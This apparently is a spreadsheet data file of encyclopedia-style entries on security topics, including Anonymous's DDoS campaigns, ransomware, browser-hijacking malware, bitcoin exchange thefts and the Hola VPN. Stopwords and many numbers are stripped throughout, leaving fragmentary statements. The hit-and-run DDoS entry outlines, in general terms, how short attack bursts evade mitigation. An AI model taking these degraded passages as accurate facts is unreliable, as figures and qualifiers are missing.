members anonymous participating ddos attack various websites organizations including recording industry association america, motion picture association america, united states copyright office library congress, visa, mastercard, bank america. they charged count "conspiracy intentionally cause damage protected computer" events occurred september 2010 january 2011. ddos attacks federal offenses united states prosecuted department justice title section 1030.in 2013, anonymous petitioned united states government people, demanding ddos attacks recognized form virtual protest similar occupy protests. countermeasures ddos mitigation usually works principle distribution, basically intelligent routing traffic avoid congestion prevent overload single url. other methods counter ddos include installation intrusion prevention system (ips) intrusion detection system (ids) devices application software. first attacks anonymous first group utilize high orbit cannon publicly. after megaupload, file-sharing website, shut federal agents raided premises, anonymous launched attack website department justice. website went offline anonymous claimed success twitter, saying "one thing certain: expect #megaupload". over course next hours, several websites knocked offline kept offline. these included websites belonging recording industry association america (riaa), motion picture association america (mpaa) bmi. finally, drew close, website belonging repeatedly ultimately succumbed attacks acquired “tango down” status. anonymous claimed "the single largest internet attack history", reported many 27,000 user agents taking part attack. also references external links high orbit cannon development downloads sourceforge</t>
  </si>
  <si>
    <t>Higinio Ochoa</t>
  </si>
  <si>
    <t>higinio ochoa, also known w0rmer, american hacker. 2012, associated hacker group cabincr3w, arrested federal bureau investigation (fbi) ultimately served years federal prison hacking. 2021, ochoa member white-hat hacker group sakura samurai. career ochoa member sakura samurai, white-hat hacking group known large-scale breaches governmental groups corporations. ochoa others sakura samurai responsible 2021 vulnerability disclosures pertaining john deere software. early hacking conviction february 2012, ochoa hacked protected computers including texas department public safety, alabama department public safety, west virginia chiefs police association houston county, alabama. after accessing systems, ochoa downloaded shared confidential personal information systems, erased data, vandalized websites. time, ochoa associated cabincr3w, hacker group grown anonymous.ochoa arrested specifically relation access alabama department public safety computers, reason connected criminal database. ochoa replaced database self-proclaimed trademark, photo woman bikini, holding sign reading "pwnd w0rmer cabincr3w, bitch's!" woman photo taken picture iphone location services enabled. through this, traced photo back exact coordinates, discovered identity, found facebook page, revealed ochoa fiancé. arrested ochoa march 2012, galveston, texas.on june 2012, ochoa charged hacking enforcement systems publishing personal information officers, including phone numbers home addresses, cabincr3w called "operation roast". ochoa sentenced years prison ordered approximately us$14,000 restitution unauthorized access agencies' computers. media 2015, ochoa featured episode podcast reply (podcast), episode titled "hack police".in 2016, ochoa featured season episode showtime series dark net, episode titled "ctrl".in 2020, ochoa featured episode podcast darknet diaries, episode titled "w0rmer". references</t>
  </si>
  <si>
    <t>HijackThis</t>
  </si>
  <si>
    <t>hijackthis (also hijackthis hjt) free open-source tool detect malware adware microsoft windows. originally created merijn bellekom, later sold trend micro. program notable quickly scanning user's computer display common locations malware, rather relying database known spyware. hijackthis used primarily diagnosis malware, remove detect spyware—as uninformed removal facilities cause significant software damage computer. browser hijacking cause malware installed computer. february 2012, trend micro released hijackthis source code open source available sourceforge site. hijackthis generate plain-text logfile detailing entries finds, entries fixed hijackthis. inexperienced users advised exercise caution seek help using latter option. except small whitelist known safe entries, hijackthis discriminate legitimate unwanted items. hijackthis attempts create backups files registry entries fixes, used restore system event mistake. common post logfile forum experienced users help decipher entries need removed. automated tools also exist analyze saved logs attempt provide recommendations user, clean entries automatically. tools, however, generally discouraged specialize manually dealing hijackthis logs: consider tools dangerous inexperienced users, neither accurate reliable enough substitute consulting trained human analyst. later versions hijackthis include additional tools task manager, hosts-file editor, alternate-data-stream scanner. hijackthis reached end-of-life 2013 longer developed. however, team recommended unofficial replacement called hijackthis fork developed stanislav polshyn. hijackpro during 2002 2003, entrepreneur glenn bluff (owner computer hope made several attempts hijackthis. this joint development hijackpro, professional version hijackthis built-in capabilities kill processes similar killbox. hijackpro million downloads illegal download site 2003 2004 found sites claiming hijackthis free. hijackpro sold touchstone software phoenix technologies 2007 integrated driveragent.com along glenn bluff's company drivermagic.com. references external links official website</t>
  </si>
  <si>
    <t>Himmat (app)</t>
  </si>
  <si>
    <t>himmat women's safety mobile application delhi police. launched home minister rajnath singh january 2015. freely available android mobile phones downloaded delhi police website. delhi police plans launch platforms future. registrations problems resulted parliamentary panel calling failure 2018. himmat gone called india's best safety apps women. references</t>
  </si>
  <si>
    <t>History of bitcoin</t>
  </si>
  <si>
    <t>bitcoin cryptocurrency, digital asset uses cryptography control creation management rather relying central authorities. originally designed medium exchange, bitcoin primarily regarded store value. history bitcoin started invention implementation satoshi nakamoto, integrated many existing ideas cryptography community. over course bitcoin's history, undergone rapid growth become significant store value offline. from mid-2010s, businesses began accepting bitcoin addition traditional currencies. background prior release bitcoin, number digital cash technologies starting issuer-based ecash protocols david chaum stefan brands. idea solutions computational puzzles could value first proposed cryptographers cynthia dwork moni naor 1992. idea independently rediscovered adam back developed hashcash, proof-of-work scheme spam control 1997. first proposals distributed digital scarcity based cryptocurrencies dai's b-money nick szabo's gold. finney developed reusable proof work (rpow) using hashcash proof work algorithm.in gold proposal proposed collectible market-based mechanism inflation control, nick szabo also investigated additional aspects including byzantine fault-tolerant agreement protocol based quorum addresses store transfer chained proof-of-work solutions, vulnerable sybil attacks, though. creation january 2008, domain name bitcoin.org registered. later year, october, link paper authored satoshi nakamoto titled bitcoin: peer-to-peer electronic cash system posted cryptography mailing list. this paper detailed methods using peer-to-peer network generate described system electronic transactions without relying trust". january 2009, bitcoin network came existence satoshi nakamoto mining genesis block bitcoin (block number reward bitcoins. embedded coinbase block text: times 03/jan/2009 chancellor brink second bailout banks text refers headline times published january 2009. this note interpreted timestamp genesis date derisive comment instability caused fractional-reserve banking.: first open source bitcoin client released january 2009, hosted sourceforge.one first supporters, adopters, contributors bitcoin receiver first bitcoin transaction programmer finney. finney downloaded bitcoin software released, received bitcoins nakamoto world's first bitcoin transaction january 2009 (bloc 170). other early supporters dai, creator bitcoin predecessor b-money, nick szabo, creator bitcoin predecessor gold.in early days, nakamoto estimated mined million bitcoins. before disappearing involvement bitcoin, nakamoto sense handed reins developer gavin andresen, became bitcoin lead developer bitcoin foundation, 'anarchic' bitcoin community's closest thing official public face. satoshi nakamoto "satoshi nakamoto" presumed pseudonym person people designed original bitcoin protocol 2008 launched network 2009. nakamoto responsible creating majority official bitcoin software active making modifications posting technical information bitcoin forum. there much speculation identity satoshi nakamoto suspects including dai, szabo, finney accompanying denials. possibility satoshi nakamoto computer collective european financial sector also discussed.investigations real identity satoshi nakamoto attempted yorker fast company. yorker's investigation brought least possible candidates: michael clear vili lehdonvirta. fast company's investigation brought circumstantial evidence linking encryption patent application filed neal king, vladimir oksman charles august 2008, bitcoin.org domain name registered hours later. patent application (#20100042841) contained networking encryption technologies similar bitcoin's, textual analysis revealed phrase "... computationally impractical reverse" appeared patent application bitcoin's whitepaper. three inventors explicitly denied satoshi nakamoto.in 2013, nelson speculated japanese mathematician shinichi mochizuki satoshi nakamoto. later 2013 israeli researchers dorit shamir pointed silk road-linked ross william ulbricht possible person behind cover. researchers based suspicion analysis network bitcoin transactions. these allegations contested shamir later retracted claim.nakamoto's involvement bitcoin appear extend past mid-2010. april 2011, nakamoto communicated bitcoin contributor, saying "moved things".stefan thomas, swiss coder active community member, graphed time stamps nakamoto's 500-plus bitcoin forum posts; resulting chart showed steep decline almost posts hours a.m. a.m. greenwich mean time. because pattern held true even saturdays sundays, suggested nakamoto asleep time, hours a.m. a.m. midnight a.m. eastern standard time (north american eastern standard time). other clues suggested nakamoto british: newspaper headline encoded genesis block came uk-published newspaper times, forum posts comments bitcoin source code used british english spellings, "optimise" "colour".an internet search anonymous blogger texts similar writing bitcoin whitepaper suggests nick szabo's "bit gold" articles similar author. nick denied satoshi, stated official opinion satoshi bitcoin 2011 article.in march 2014 article newsweek, journalist leah mcgrath goodman doxed dorian nakamoto temple city, california, saying satoshi nakamoto man's birth name. methods conclusion drew widespread criticism.in june 2016, london review books published piece andrew o'hagan nakamoto.after 2020 youtube documentary pointed adam back creator bitcoin, widespread discussion ensued. real identity satoshi nakamoto still remains matter dispute. growth 2010 first retail transaction involving physical goods paid 2010, exchanging 10,000 mined pizzas delivered local pizza restaurant florida, marking bitcoin pizza crypto-fans. time, transaction's value typically negotiated bitcoin forum.on august 2010, major vulnerability bitcoin protocol spotted. while protocol verify transaction's outputs never exceeded inputs, transaction whose outputs summed {\displaystyle 2^{64}} would overflow, permitting transaction author create arbitrary amounts bitcoin. august, vulnerability exploited; single transaction spent bitcoin send billion bitcoins {\displaystyle 2^{63}} satoshis) different addresses network. within hours, transaction spotted, fixed, blockchain forked miners using updated version bitcoin protocol. since blockchain forked problematic transaction, transaction longer appears blockchain used bitcoin network today. this major security flaw found exploited bitcoin's history. 2011 based bitcoin's open-source code, cryptocurrencies started emerge.the electronic frontier foundation, non-profit group, started accepting bitcoins january 2011, stopped accepting june 2011, citing concerns lack legal precedent currency systems. eff's decision reversed 2013 resumed accepting bitcoin.in june 2011, wikileaks organizations began accept bitcoins donations. 2012 january 2012, bitcoin featured main subject within fictionalized trial legal drama good wife third-season episode "bitcoin dummies". host cnbc's money, cramer, played courtroom scene testifies consider bitcoin true currency, saying, "there's central bank regulate digital functions completely peer peer".in september 2012, bitcoin foundation launched "accelerate global growth bitcoin standardization, protection, promotion open source protocol". founders gavin andresen, matonis, patrick murck, charlie shrem, peter vessenes.in october 2012, bitpay reported 1,000 merchants accepting bitcoin payment processing service. november 2012, wordpress started accepting bitcoins. 2013 february 2013, bitcoin-based payment processor coinbase reported selling us$1 million worth bitcoins single month bitcoin. internet archive announced ready accept donations bitcoins intends give employees option receive portions salaries bitcoin currency.in march, bitcoin transaction log, called blockchain, temporarily split independent chains differing rules transactions accepted. hours bitcoin networks operated time, version transaction history. core developers called temporary halt transactions, sparking sharp sell-off. normal operation restored majority network downgraded version bitcoin software. exchange briefly halted bitcoin deposits exchange rate briefly dipped event occurred recovering previous level approximately following hours. financial crimes enforcement network (fincen) established regulatory guidelines "decentralized virtual currencies" bitcoin, classifying american bitcoin miners sell generated bitcoins money service businesses msbs), subject registration legal obligations.in april, payment processors bitinstant experienced processing delays insufficient capacity resulting bitcoin exchange rate dropping $266 returning $160 within hours. bitcoin gained greater recognition services okcupid foodler began accepting payment. april 2013, eric posner, professor university chicago, stated real ponzi scheme takes fraud; bitcoin, contrast, seems like collective delusion."on 2013, authorities seized accounts associated discovering registered money transmitter fincen us.on 2013, reported bitinstant processed approximately percent money going bitcoin, april alone facilitated 30,000 transactions,on june 2013, reported drug enforcement administration listed 11.02 bitcoins seized asset united states department justice seizure notice pursuant u.s.c. 881. this marked first time government agency claimed seized bitcoin.in july 2013, project began kenya linking bitcoin m-pesa, popular mobile payments system, experiment designed spur innovative payments africa. during month foreign exchange administration policy department thailand stated bitcoin lacks legal framework would therefore illegal, effectively banned trading bitcoin exchanges country.on august 2013, federal judge amos mazzant eastern district texas fifth circuit ruled bitcoins currency form money" (specifically securities defined federal securities laws), subject court's jurisdiction, germany's finance ministry subsumed bitcoins term "unit account" financial instrument though e-money functional currency, classification nonetheless legal implications.in october 2013, seized roughly 26,000 website silk road arrest alleged owner ross william ulbricht. companies, robocoin bitcoiniacs launched world's first bitcoin october 2013 vancouver, canada, allowing clients sell purchase bitcoin currency downtown coffee shop. chinese internet giant baidu allowed clients website security services bitcoins.in november 2013, university nicosia announced would accepting bitcoin payment tuition fees, university's chief financial officer calling "gold tomorrow". during november 2013, china-based bitcoin exchange china overtook japan-based europe-based bitstamp become largest bitcoin trading exchange trade volume.in december 2013, overstock.com announced plans accept bitcoin second half 2014. december 2013, people's bank china prohibited chinese financial institutions using bitcoins. after announcement, value bitcoins dropped, baidu longer accepted bitcoins certain services. buying real-world goods virtual currency illegal china since least 2009.on december 2013, alan greenspan referred "bubble". 2014 january 2014, zynga announced testing bitcoin purchasing in-game assets seven games. that month, vegas casino hotel golden gate hotel casino properties downtown vegas announced would also begin accepting bitcoin, according article today. article also stated currency would accepted five locations, including front desk certain restaurants. network rate exceeded petahash/sec. tigerdirect overstock.com started accepting bitcoin. early february 2014, largest bitcoin exchanges, gox, suspended withdrawals citing technical issues. month, filed bankruptcy protection japan amid reports 744,000 bitcoins stolen. months filing, popularity waned users experienced difficulties withdrawing funds.in june 2014, network exceeded petahash/sec. june 2014, announced bitcoin payment service provider bitpay would become sponsor petersburg bowl two-year deal, renamed bitcoin petersburg bowl. bitcoin accepted ticket concession sales game part sponsorship, sponsorship also paid using bitcoin.in july 2014, newegg dell started accepting bitcoin. september 2014, teraexchange, llc, received approval u.s.commodity futures trading commission "cftc" begin listing over-the-counter swap product based price bitcoin. cftc swap product approval marks first time u.s. regulatory agency approved bitcoin financial product.in december 2014, microsoft began accept bitcoin xbox games windows software.in 2014, several light-hearted songs celebrating bitcoin "ode satoshi" released.a documentary film, rise rise bitcoin, released 2014, featuring interviews bitcoin users computer programmer drug dealer.on march 2014, warren buffett called bitcoin "mirage". 2015 january 2015, coinbase raised us$75 million part series funding round, smashing previous record bitcoin company. less year collapse gox, united kingdom-based exchange bitstamp announced exchange would taken offline investigate hack resulted 19,000 bitcoins (equivalent roughly us$5 million time) stolen wallet. exchange remained offline several days amid speculation customers lost funds. bitstamp resumed trading january increasing security measures assuring customers account balances would impacted.in february 2015, number merchants accepting bitcoin exceeded 100,000.in 2015, (museum applied arts, vienna) became first museum acquire using bitcoin, purchased screensaver "event listeners" dorpel.in october 2015, proposal submitted unicode consortium code point bitcoin symbol. 2016 january 2016, network rate exceeded exahash/sec.in march 2016, cabinet japan recognized virtual currencies like bitcoin function similar real money. bidorbuy, largest south african online marketplace, launched bitcoin payments buyers sellers.in july 2016, researchers published paper showing november 2013 bitcoin commerce longer driven "sin" activities instead legitimate enterprises.in august 2016, major bitcoin exchange, bitfinex, hacked nearly 120,000 (around $60m) stolen.in november 2016, swiss railway operator (cff) upgraded automated ticket machines bitcoin could bought using scanner ticket machine scan bitcoin address phone app.bitcoin generates academic interest year year; number google scholar articles published mentioning bitcoin grew 2009, 2012, 3580 2016. also, academic journal ledger published first issue. edited peter rizun. 2017 number businesses accepting bitcoin continued increase. january 2017, reported number online stores accepting bitcoin japan increased times past year. bitpay stephen pair declared company's transaction rate grew january 2016 february 2017, explained usage bitcoin growing supply chain payments.bitcoin gains legitimacy among lawmakers legacy financial companies. example, japan passed accept bitcoin legal payment method, russia announced legalize cryptocurrencies bitcoin.exchange trading volumes continue increase. 6-month period ending march 2017, mexican exchange bitso trading volume increase 1500%. between january 2017 poloniex increase 600% active traders online regularly processed 640% transactions.in june 2017, bitcoin symbol encoded unicode version 10.0 position u+20bf currency symbols block.up july 2017, bitcoin users maintained common rules cryptocurrency. august 2017 bitcoin split derivative digital currencies, bitcoin (btc) chain blocksize limit bitcoin cash (bch) chain blocksize limit. split called bitcoin cash hard fork.on december 2017 software marketplace steam announced would longer accept bitcoin payment products, citing slow transactions speeds, price volatility, high fees transactions. 2018 january 2018, south korea brought regulation requires bitcoin traders reveal identity, thus putting anonymous trading bitcoins.on january 2018, online payment firm stripe announced would phase support bitcoin payments late april 2018, citing declining demand, rising fees longer transaction times reasons.on january 2018, george soros referred bitcoin bubble. 2019 dawn 2019 found bitcoin trading $4000 mark difficult year global crypto market. climbed $12,000 july before. 2020 july 2020, indian company shares started quote bitcoin exchange-traded products (etp) xetra trading system deutsche boerse.on september 2020, wiener börse listed first titles denominated cryptocurrencies like bitcoin, including services real-time quotation securities settlement.on september 2020, frankfurt stock exchange admitted regulated market quotation first bitcoin exchange-traded note (etn), centrally cleared eurex clearing.in october 2020, paypal announced would allow users sell bitcoin platform, although deposit withdraw bitcoins. 2021 from february 2021, swiss canton allows payments bitcoin cryptocurrencies.on june 2021, salvador president nayib bukele announced plans adopt bitcoin legal tender; would render salvador world's first country so.on june 2021, initiative president, pro-government deputies legislative assembly salvador voted legislation—ley bitcoin bitcoin law—to make bitcoin legal tender country alongside dollar. 2022 global economic factors stemmed russia’s ukraine negatively affected price bitcoin. april 2022, price fell back $40,000. dropped $26,970 collapse terra-luna sister stablecoin, ust, addition shedding tech stocks. june, bitcoin dropped $18,000, trade levels beneath 2017 highs. prices value history among factors contributed rise european sovereign-debt crisis particularly 2012–2013 cypriot financial crisis statements fincen improving currency's legal standing, rising media internet interest.until 2013, almost market bitcoins united states dollars (us$).as market valuation total stock bitcoins approached us$1 billion, commentators called bitcoin prices bubble. early april 2013, price bitcoin dropped $266 around rose around $100. over weeks starting late june 2013 price dropped steadily $70. price began recover, peaking october $140. october, silk road seized fbi. this seizure caused flash crash $110. price quickly rebounded, returning $200 several weeks later. latest went $200 november $900 november. bitcoin passed us$1,000 november 2013 gox. forks fork, referring blockchain, defined variously blockchain split paths forward, change protocol rules. accidental forks bitcoin network regularly occur part mining process. they happen miners find block similar point time. result, network briefly forks. this fork subsequently resolved software automatically chooses longest chain, thereby orphaning extra blocks added shorter chain (that dropped longer chain). march 2013 march 2013, bitcoin miner running version 0.8.0 bitcoin software created large block considered invalid version (due undiscovered inconsistency versions). this created split "fork" blockchain since computers recent version software accepted invalid block continued build diverging chain, whereas older versions software rejected continued extending blockchain without offending block. this split resulted separate transaction logs formed without clear consensus, allowed funds spent differently chain. response, exchange temporarily halted bitcoin deposits. exchange rate fell exchange rose back prior level $48.miners resolved split downgrading version 0.7, putting back track canonical blockchain. user funds largely remained unaffected available network consensus restored. network reached consensus continued operate normal hours split. august 2017 significant forks took place august. one, bitcoin cash, hard fork main chain opposition other, soft fork implement segregated witness. regulatory issues march 2013, financial crimes enforcement network fincen), bureau united states department treasury, issued report regarding centralized decentralized "virtual currencies" legal status within "money services business" (msb) bank secrecy regulations. classified digital currencies digital payment systems bitcoin "virtual currencies" legal tender sovereign jurisdiction. fincen cleared american users bitcoin legal obligations saying, user virtual currency fincen's regulations therefore subject registration, reporting, recordkeeping regulations." however, held american entities generate "virtual currency" bitcoins money transmitters msbs sell generated currency national currency: "...a person creates units convertible virtual currency sells units another person real currency equivalent engaged transmission another location money transmitter." this specifically extends "miners" bitcoin currency register msbs abide legal requirements money transmitter sell generated bitcoins national currency within united states. since fincen issued guidance, dozens virtual currency exchangers administrators registered fincen, fincen receiving increasing number suspicious activity reports (sars) entities.additionally, fincen claimed regulation american entities manage bitcoins payment processor setting exchanger: addition, person exchanger money transmitter person accepts de-centralized convertible virtual currency person transmits another person part acceptance transfer currency, funds, value substitutes currency."in summary, fincen's decision would require bitcoin exchanges bitcoins traded traditional currencies disclose large transactions suspicious activity, comply money laundering regulations, collect information customers traditional financial institutions required do.jennifer shasky calvery, director fincen said, "virtual currencies subject rules currencies. basic money-services business rules apply here."in october 2012 study, virtual currency schemes, european central bank concluded growth virtual currencies continue, and, given currencies' inherent price instability, lack close regulation, risk illegal uses anonymous users, bank warned periodic examination developments would necessary reassess risks.in 2013, u.s. treasury extended anti-money laundering regulations processors bitcoin transactions.in june 2013, bitcoin foundation board member matonis wrote forbes received warning letter california department financial institutions accusing foundation unlicensed money transmission. matonis denied foundation engaged money transmission said viewed case opportunity educate state regulators."in late july 2013, industry group committee establishment digital asset transfer authority began form best practices standards, work regulators policymakers adapt existing currency requirements digital currency technology business models develop risk management standards.in 2014, u.s. securities exchange commission filed administrative action erik voorhees, violating securities section publicly offering unregistered interests bitcoin websites exchange bitcoins.by december 2017, bitcoin futures contracts began offered, chicago board options exchange (cboe) formally settling futures daily. 2019, multiple trading companies offering services around bitcoin futures. bitcoin faucets bitcoin faucet reward system, form website software app, dispenses rewards form satoshi, worth hundredth millionth btc, visitors claim exchange completing captcha task described website. there also faucets dispense alternative cryptocurrencies. first bitcoin faucet called "the bitcoin faucet" developed gavin andresen 2010. originally gave five bitcoins person. rewards dispensed various predetermined intervals time rewards completing simple tasks captcha completion prizes simple games. faucets usually give fractions bitcoin, amount typically fluctuate according value bitcoin. some faucets also random larger rewards. reduce mining fees, faucets normally save small individual payments ledgers, make larger payment sent user's bitcoin address.because bitcoin transactions irreversible many faucets, become targets hackers interested stealing bitcoins. advertisements main income source bitcoin faucets. faucets traffic users offering free bitcoin incentive. some networks also directly bitcoin. this means faucets often profit margin. some faucets also make money mining altcoins background, using user's cpu. theft exchange shutdowns bitcoins stored bitcoin cryptocurrency wallet. theft bitcoin documented numerous occasions. times, bitcoin exchanges shut down, taking clients' bitcoins them. wired study published april 2013 showed percent bitcoin exchanges closing.on june 2011, security breach bitcoin exchange caused nominal price bitcoin fraudulently drop cent exchange, hacker used credentials auditor's compromised computer illegally transfer large number bitcoins himself. they used exchange's software sell nominally, creating massive "ask" order price. within minutes, price reverted correct user-traded value. accounts equivalent us$8,750,000 affected.in july 2011, operator bitomat, third-largest bitcoin exchange, announced lost access wallet.dat file 17,000 bitcoins (roughly equivalent us$220,000 time). announced would sell service missing amount, aiming funds sale refund customers.in august 2011, mybitcoin, defunct bitcoin transaction processor, declared hacked, caused shut down, paying customer deposits, leaving 78,000 bitcoins (equivalent roughly us$800,000 time) unaccounted for.in early august 2012, lawsuit filed francisco court bitcoinica bitcoin trading venue claiming us$460,000 company. bitcoinica hacked twice 2012, allegations venue neglected safety customers' money cheated withdrawal requests.in late august 2012, operation titled bitcoin savings trust shut owner, leaving around us$5.6 million bitcoin-based debts; allegations operation ponzi scheme. september 2012, u.s. securities exchange commission reportedly started investigation case.in september 2012, bitfloor, bitcoin exchange, also reported hacked, 24,000 bitcoins (worth us$250,000) stolen. result, bitfloor suspended operations. month, bitfloor resumed operations; founder said reported theft fbi, plans repay victims, though time frame repayment unclear.on april 2013, instawallet, web-based wallet provider, hacked, resulting theft 35,000 bitcoins valued us$129.90 bitcoin time, nearly $4.6 million total. result, instawallet suspended operations.on august 2013, bitcoin foundation announced pseudorandom number generator within android operating system exploited steal wallets generated android apps; fixes provided august 2013.in october 2013, inputs.io, australian-based bitcoin wallet provider hacked loss 4100 bitcoins, worth million time theft. service operator tradefortress. coinchat, associated bitcoin chat room, taken admin.on october 2013, hong kong–based bitcoin trading platform owned global bond limited (gbl) vanished million yuan (us$5 million) investors.mt. gox, japan-based exchange 2013 handled worldwide bitcoin traffic, declared bankruptcy february 2014, bitcoins worth $390 million missing, unclear reasons. eventually arrested charged embezzlement.on march 2014, flexcoin announced closing doors hack attack took place before. statement occupied homepage, announced march 2014 flexcoin resources, assets, otherwise come back loss [the hack], closing doors immediately." users longer site. chinese cryptocurrency exchange bter lost $2.1 million february 2015. slovenian exchange bitstamp lost bitcoin worth $5.1 million hack january 2015. us-based exchange cryptsy declared bankruptcy january 2016, ostensibly 2014 hacking incident; court-appointed receiver later alleged cryptsy's stolen $3.3 million. august 2016, hackers stole million customer bitcoin hong kong–based exchange bitfinex.in december 2017, hackers stole 4,700 bitcoins nicehash, platform allowed users sell hashing power. value stolen bitcoins totaled million time.on december 2017, yapian, company owns youbit cryptocurrency exchange south korea, filed bankruptcy following hack, second eight months. taxation regulation 2012, cryptocurrency legal advocacy group (clag) stressed importance taxpayers determine whether taxes bitcoin-related transaction based whether experienced "realization event": taxpayer provided service exchange bitcoins, realization event probably occurred gain loss would likely calculated using fair market values service provided."in august 2013, german finance ministry characterized bitcoin unit account, usable multilateral clearing circles subject capital gains held less year.on december 2013, people's bank china announced press release regarding bitcoin regulation whilst individuals china permitted freely trade exchange bitcoins commodity, prohibited chinese financial banks operate using bitcoins bitcoins used legal tender currency, entities dealing bitcoins must track report suspicious activity prevent money laundering. value bitcoin dropped various exchanges percent following regulation announcement, rebounding upward again. arbitrary blockchain content bitcoin's blockchain loaded arbitrary data. 2018 researchers rwth aachen university goethe university identified 1,600 files added blockchain, included links unlawful images child exploitation, politically sensitive content, privacy violations. "our analysis shows certain content, e.g. illegal pornography, render mere possession blockchain illegal."interpol also sent alert 2015 saying "the design blockchain means possibility malware injected permanently hosted methods currently available wipe data". references external links interactive bitcoin history</t>
  </si>
  <si>
    <t>C2.LOP</t>
  </si>
  <si>
    <t>lop, live online portal, malware installed microsoft windows.lop.com site owned c2media ltd. pay-per-click search portal websites click sites lop. method used people site install browser hijacker component people's computers would advertise site pop-ups. installer could turn user's browser device different links lop.com.older variants quite predictable installed browser helper objects startup entries known names. some later variants used string pseudo-random words executable names placing executables user's application data directory. example, variants call file "meal house bone.exe". known programs bundle patchou's messenger plus warez client references</t>
  </si>
  <si>
    <t>Hit (Internet)</t>
  </si>
  <si>
    <t>request server file (such page, image, javascript, cascading style sheet). there many hits page view since html page contain multiple files, images. also unique user analytics traffic pageview references further reading "site server capacity model internet transactions". microsoft.com. april 1999. retrieved 2007. schurman, kyle (june 1997). your site hit?". smartcomputing.com. archived original 2012-02-05. retrieved 2018-04-29.</t>
  </si>
  <si>
    <t>Hit-and-run DDoS</t>
  </si>
  <si>
    <t>hit-and-run ddos type denial-of-service (ddos) attack uses short bursts high volume attacks random intervals, spanning time frame days weeks. purpose hit-and-run ddos prevent user service using service bringing host server. this type attack distinguished persistent ddos attack continues attacker stops attack host server able defend method attack ddos attack characterized explicit attempt attackers prevent legitimate users service using service. hit-and-run ddos accomplished using high volume network application attacks short bursts. attacks last long enough bring server hosting service, normally minutes. attack repeated every hours period days weeks, causing issues company hosting service. hit-and-run ddos sometimes used test ddos attack. attacker inject packets network test online functioning. once network verified functioning, attacker persistent ddos attack.hit-and-run ddos exploits anti-ddos software services used defend prolonged ddos attacks. activating software take longer actual attack, allowing denial service ddos protection start defend attack. also billion laughs computer crime smurf attack references</t>
  </si>
  <si>
    <t>Hitler-Ransomware</t>
  </si>
  <si>
    <t>hitler-ransomware, hitler-ransonware [sic], form ransomware created 2016 originating germany. requests payment within hour; otherwise, delete files infected computer. history hitler-ransomware first developed 2016. ransomware activates lock screen image adolf hitler giving nazi salute. message states "this hitler-ransonware [sic]. your files encrypted! decrypt files?". demands payment form vodafone mobile phone gift card gives owner computer hour countdown timer accompanying. failing ransom hour countdown timer reaches zero results system crashing blue screen death computer reboots, files computer's user profile folders deleted. contrary claims, ransomware encrypt computer files; instead, runs script mislead people thinking files encrypted.the virus discovered technologies analyst jakub kroustek. upon investigation determined likely originated germany prototype given batch file associated words "das test" (german: this test) noted hitler ransomware's demand payment gift cards instead bitcoin uncommon, unique ransomware. spelling mistakes made demands technology journalists joke could upset grammar nazis.an updated version hitler-ransomware disguised "cainxpii" called “hitler later released. this version similar original except corrected spelling "ransomware" removed countdown timer. january 2017, updated version known "the final version" hitler-ransomware released. references</t>
  </si>
  <si>
    <t>HitmanPro</t>
  </si>
  <si>
    <t>hitmanpro (formerly hitman pro) portable antimalware program, aims detect found) remove malicious files registry entries related rootkits, trojans, viruses, worms, spyware, adware, rogue antivirus programs, ransomware, malware infected computers. suspicious objects analyzed across internet connection using range online malware detection services (see multiscanning), removed hitmanpro confirmed. latest version 3.7.9 uses bitdefender kaspersky in-cloud technology partners. there system load virus definitions installed tested depth computer question; rather analyzed remotely. company behind hitmanpro, surfright, acquired sophos december 2015. scan types version hitmanpro three different types antimalware scans: default scan, quick scan, early score warning. default scan check entire computer send suspicious files cloud. quick scan scan common parts infections send unknown files cloud. early score warning scan entire computer examine every file advanced heuristics check common symptoms malware, including recently installed computer, starts automatically windows boots, impersonating common system file, even tray icon taskbar. previous versions hitmanpro completely different design earlier versions hitman developed mark loman netherlands. previous versions, version automatically download, install third party anti-spyware anti-adware programs freely available internet: webroot sweeper (trial, expires days) tools spyware doctor (demo, clean anything) eset nod32 (trial, expires days) lavasoft adaware (freeware) safer networking spybot search destroy (freeware) trendmicro cwshredder (freeware) javacool software spywareblaster (freeware) mcafee virusscan superdat (virus signature definition updates, mcafee primesupport license required qualifying product) ewido micro scanner (freeware) references external links official website</t>
  </si>
  <si>
    <t>Hola (VPN)</t>
  </si>
  <si>
    <t>hola freemium mobile application provides form service users peer-to-peer network. also uses peer-to-peer caching. when user accesses certain domains known geo-blocking, hola application redirects request computers internet connections users non-blocked areas, thereby circumventing blocking. users free service share portion idle upload bandwidth used serving cached data users. paying users choose redirect requests peers never used peers. history 1998, ofer vilenski derry shribman founded krftech, software development tools company. with profits company, started jungo 2000 develop operating system home gateways. 2006, (cisco) acquired jungo $107 million.in 2008, vilenski shribman started investigating idea re-inventing http building peer-to-peer overlay network would employ peer-to-peer caching accelerate content distribution peer-to-peer routing make effective bandwidth target sites much faster. this would make internet faster users cheaper operate content distributors. they started hola million investors (skype, hotmail), horizons ventures ka-shing's venture capital fund), magma venture partners (waze), israel's chief scientist fund, others.hola networks limited launched network late 2012, became popular january 2013 consumers started using hola internet privacy anonymity utilizing routing masking. "after around months downloads day, january 2013, israel time, product good enough. that second took went overnight 40,000 downloads day", vilenski told startup camel.in 2015, hola came criticism 8chan founder fredrick brennan site reportedly attacked exploiting hola network. late 2014, hola begun selling access userbase exit nodes, name luminati, charging gigabyte bandwidth actually coming free users. this confirmed hola founder ofer vilenski argued always part agreement hola's free users signing service. after brennan emailed company, hola modified include notice users acting exit nodes paid users hola's sister service luminati. other criticism stemmed vulnerabilities inherent software, could allow attacker deliver malware hola users. hola browser also used distributed denial service attacks.in response criticism, vilenski told business insider, "[we been] listening conversations hola think we've clear doing, decided provide details works, thus changes website] past hours". according security researchers performed audit, hola updated software vulnerabilities remained june 2015.in november 2016, hola reached million users. august 2017, hola sold majority stake luminati capital, private equity investment firm. deal potentially valued $200 million, hola founders retaining stake luminati vilenski remaining luminati. 2019, final purchase price revealed $125 million exchange 75.6% company's shares company evaluated $165 million. architecture hola company website claimed 2014 "internet slowed server response times, internet congestion, round trip times, poorly written communication stacks operating systems. hola removes bottlenecks securely caching content peers view later serving nearby peers need hola also compresses communication peers speed net." platforms hola distributed browser extensions firefox, microsoft edge, opera, well applications microsoft windows macos. hola also released android application recently iphone ipad application. also comparison virtual private network services references external links official website</t>
  </si>
  <si>
    <t>HoneyMonkey</t>
  </si>
  <si>
